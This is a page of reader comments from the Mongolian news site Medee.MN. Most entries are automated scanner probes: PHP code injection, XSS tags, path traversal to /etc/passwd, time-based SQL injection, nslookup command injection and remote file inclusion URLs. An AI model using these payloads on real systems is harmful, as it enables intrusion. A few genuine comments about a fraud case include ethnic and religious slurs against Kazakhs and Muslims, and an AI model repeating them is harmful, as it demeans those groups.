GRLpGpAG [116.113.93.829313441] 2020-10-28 20:46:11

1

'" [116.113.93.82] 2020-10-28 20:46:11

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-28 20:46:11

1

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-28 20:46:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:09

<!--

GRLpGpAG ['"()&%<acx><ScRiPt >pN9G(9893)</ScRiPt>] 2020-10-28 20:46:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:09

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-28 20:46:08

1

create/. [116.113.93.82] 2020-10-28 20:46:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:08

'"

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:08

1

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-28 20:46:08

1

create [116.113.93.82] 2020-10-28 20:46:08

1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >pN9G(9459)</ScRiPt>] 2020-10-28 20:46:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:07

1

/www.vulnweb.com [116.113.93.82] 2020-10-28 20:46:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:07

${@print(md5(acunetix_wvs_security_test))}\

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:07

1

create [116.113.93.82] 2020-10-28 20:46:07

1

GRLpGpAG [] 2020-10-28 20:46:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:07

1

testasp.vulnweb.com [116.113.93.82] 2020-10-28 20:46:07

1

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-28 20:46:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:06

/www.vulnweb.com

GRLpGpAG [<!--] 2020-10-28 20:46:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:06

create/.

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:06

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:06

1

GRLpGpAG [] 2020-10-28 20:46:06

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 20:46:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:05

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG ['"] 2020-10-28 20:46:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:05

create

GRLpGpAG [JyI=] 2020-10-28 20:46:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:05

";print(md5(acunetix_wvs_security_test));$a="

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 20:46:05

1

http://hithanXc6xfqB.bxss.me/ [116.113.93.82] 2020-10-28 20:46:04

1

GRLpGpAG [/www.vulnweb.com] 2020-10-28 20:46:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:04

create

GRLpGpAG [@@ax2p5] 2020-10-28 20:46:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:04

';print(md5(acunetix_wvs_security_test));$a='

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 20:46:04

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 20:46:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:03

http://hit1nhqhiWPHn.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:03

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 20:46:03

1

GRLpGpAG [1] 2020-10-28 20:46:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:03

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:02

1

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 20:46:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:02

testasp.vulnweb.com

GRLpGpAG [\] 2020-10-28 20:46:02

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 20:46:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:01

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 20:46:01

1

GRLpGpAG [1'"] 2020-10-28 20:46:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:46:00

http://testasp.vulnweb.com/t/fit.txt?.jpg

Array [116.113.93.82] 2020-10-28 20:46:00

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 20:46:00

1

GRLpGpAG [http://hitjiRjWFvpm6.bxss.me/] 2020-10-28 20:46:00

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 20:46:00

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:46:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:59

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [create/.] 2020-10-28 20:45:59

1

Array [116.113.93.82] 2020-10-28 20:45:59

1

) [116.113.93.82] 2020-10-28 20:45:59

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 20:45:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:59

1

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:45:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:59

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [create] 2020-10-28 20:45:58

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 20:45:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:58

^(#$!@#$)(()))******

GRLpGpAG [file:///etc/passwd] 2020-10-28 20:45:58

1

'"() [116.113.93.82] 2020-10-28 20:45:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:58

testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:58

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [create] 2020-10-28 20:45:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:58

!(()&&!|*|*|

Зочин [116.113.93.82] 2020-10-28 20:45:58

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 20:45:58

1

Array [116.113.93.82] 2020-10-28 20:45:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

HttP://testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 20:45:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

1

GRLpGpAG [..] 2020-10-28 20:45:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

)

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

Array

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:57

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 20:45:56

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 20:45:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:56

Array

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:56

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:56

Array

GRLpGpAG [TPpqNL4A'));select pg_sleep(6); -- ] 2020-10-28 20:45:56

1

GRLpGpAG&n921383=v934778 [116.113.93.82] 2020-10-28 20:45:55

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 20:45:55

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 20:45:55

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:55

12345'"\'\");|]*{ <>

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:55

1

GRLpGpAG [xaKENHiW');select pg_sleep(3); -- ] 2020-10-28 20:45:55

1

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:45:54

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 20:45:54

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 20:45:54

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:54

GRLpGpAG [ZqvLwqMY';select pg_sleep(3); -- ] 2020-10-28 20:45:54

1

&nslookup aEBnzYaN&'\"`0&nslookup aEBnzYaN&`' [116.113.93.82] 2020-10-28 20:45:54

1

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:45:53

1

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 20:45:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:53

1&n980310=v912959

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 20:45:53

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 20:45:53

1

GRLpGpAG ['"()] 2020-10-28 20:45:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:52

1

$(nslookup Qntmrn8m) [116.113.93.82] 2020-10-28 20:45:52

1

GRLpGpAG [udCDQCCQ'; waitfor delay '0:0:9' -- ] 2020-10-28 20:45:52

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:52

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 20:45:52

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 20:45:52

1

GRLpGpAG [/etc/passwd] 2020-10-28 20:45:52

1

GRLpGpAG [Array] 2020-10-28 20:45:51

1

set|set&set [116.113.93.82] 2020-10-28 20:45:51

1

GRLpGpAG [1 waitfor delay '0:0:9' -- ] 2020-10-28 20:45:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:51

1

GRLpGpAG [)] 2020-10-28 20:45:51

1

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 20:45:51

1

"+response.write(9785928*9321507)+" [116.113.93.82] 2020-10-28 20:45:50

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 20:45:50

1

${9999402+9999493} [116.113.93.82] 2020-10-28 20:45:50

1

GRLpGpAG [(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/] 2020-10-28 20:45:50

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:50

&nslookup U5sBtfTv&'\"`0&nslookup U5sBtfTv&`'

GRLpGpAG [116.113.93.82&n926630=v986815] 2020-10-28 20:45:50

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 20:45:50

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 20:45:49

1

elNjeEkwNk0= [116.113.93.82] 2020-10-28 20:45:49

1

'+response.write(9785928*9321507)+' [116.113.93.82] 2020-10-28 20:45:49

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 20:45:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:49

${9999743+10000029}

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 20:45:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:49

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:49

$(nslookup fdRyFec7)

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 20:45:49

1

response.write(9785928*9321507) [116.113.93.82] 2020-10-28 20:45:49

1

GRLpGpAG [Array] 2020-10-28 20:45:48

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 20:45:48

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 20:45:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:48

set|set&set

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 20:45:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:48

"+response.write(9265379*9809511)+"

GRLpGpAG [Array] 2020-10-28 20:45:48

1

GRLpGpAG [${10000437+9999459}] 2020-10-28 20:45:48

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 20:45:48

1

GRLpGpAG [if(now()=sysdate(),sleep(3),0)] 2020-10-28 20:45:48

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 20:45:48

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:47

'+response.write(9265379*9809511)+'

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 20:45:47

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 20:45:47

1

GRLpGpAG [-1" OR 2+145-145-1=0+0+0+1 -- ] 2020-10-28 20:45:47

1

iQfOZSXo [116.113.93.82] 2020-10-28 20:45:47

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:46

response.write(9265379*9809511)

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 20:45:46

1

GRLpGpAG [] 2020-10-28 20:45:46

1

GRLpGpAG [-1' OR 2+627-627-1=0+0+0+1 or 'fzHq36Tt'='] 2020-10-28 20:45:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:46

95sW9KDy

GRLpGpAG [-1' OR 2+353-353-1=0+0+0+1 -- ] 2020-10-28 20:45:45

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 20:45:45

1

GRLpGpAG [&nslookup S6gSsBth&'\"`0&nslookup S6gSsBth&`'] 2020-10-28 20:45:44

1

GRLpGpAG [-1 OR 2+603-603-1=0+0+0+1] 2020-10-28 20:45:44

1

GRLpGpAG [$(nslookup KevCxPnJ)] 2020-10-28 20:45:43

1

GRLpGpAG [TRWcaogH] 2020-10-28 20:45:43

1

GRLpGpAG [-1 OR 2+829-829-1=0+0+0+1 -- ] 2020-10-28 20:45:43

1

GRLpGpAG ["+response.write(9673870*9627992)+"] 2020-10-28 20:45:42

1

GRLpGpAG [set|set&set] 2020-10-28 20:45:42

1

GRLpGpAG [JkkXnaG0] 2020-10-28 20:45:42

1

GRLpGpAG ['+response.write(9673870*9627992)+'] 2020-10-28 20:45:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:41

1

GRLpGpAG [response.write(9673870*9627992)] 2020-10-28 20:45:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:45:39

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:42:07

1

Зочин [66.181.180.209] 2020-07-20 05:40:37

Хамгийн эхэнд хахууль авч шоронгоос гаргаж хил давуулж сулалсан этгээдийг олны өмнө ил гаргаж шүүх хэрэгтэй б.на

tseegii [66.181.161.118] 2020-07-18 08:52:32

ter kazkiig alga bson geed bdag shuu dee

Зочин [66.181.178.191] 2020-07-17 10:34:12

Тэр хасгийг Хасагстанаас дэлдийтэл нь чихдэж ирэх хэрэгтэй ш дээ

Зочин [202.131.229.34] 2020-07-17 07:39:17

khasaguud ayultai, muusain lalyn islam shashintnuud

zochin [66.181.161.127] 2020-07-17 06:25:13

XYLBAR ARGAAR MUNGUTEI BOLOX GESEN XUMUUSIIG MURAT METIN GARUUD N ASHIGLAAD LMUNGIG N XAMJ ABAAD L XIL DABAAD ALGA BOLJ BGAA UYM DAA YAJ CH BODSON TENEG L ASUUDAL SHUU DEE UAG L XADGALAMJ ZEELIIN XORSHOO GESEN UG

Зочин [202.179.21.206] 2020-07-17 04:38:04

Энэ Мурат гэгч Казах Монголчуудыг нэг шулж өгчээ,өчнөөн тэрбум төгрөгийн хохиролыг нь барагдуулж шоронд хатаавал таарна.Хохирогчдыг хохиролгүй болгох нь эхний ээлжинд авах арга хэмжээ мөн шүү,манай иргэд ч гэсэн иймэрхүү Мөнгөний сүлжээний бизнесээс эрс татгалзаж байх нь зөв,юу гэж хэд дахин нугалж өгдөг мөнгө хүнд байж байхав гэж наад захын мэдэхээр зүйл шүү дээ.Арайл дэндүү гэнэн байна.

Зочин [103.10.23.81] 2020-07-18 12:45:33

Хамгийн тэнэг шуналтан ийм зүүлд хууртдаг юм


1106 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1106 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.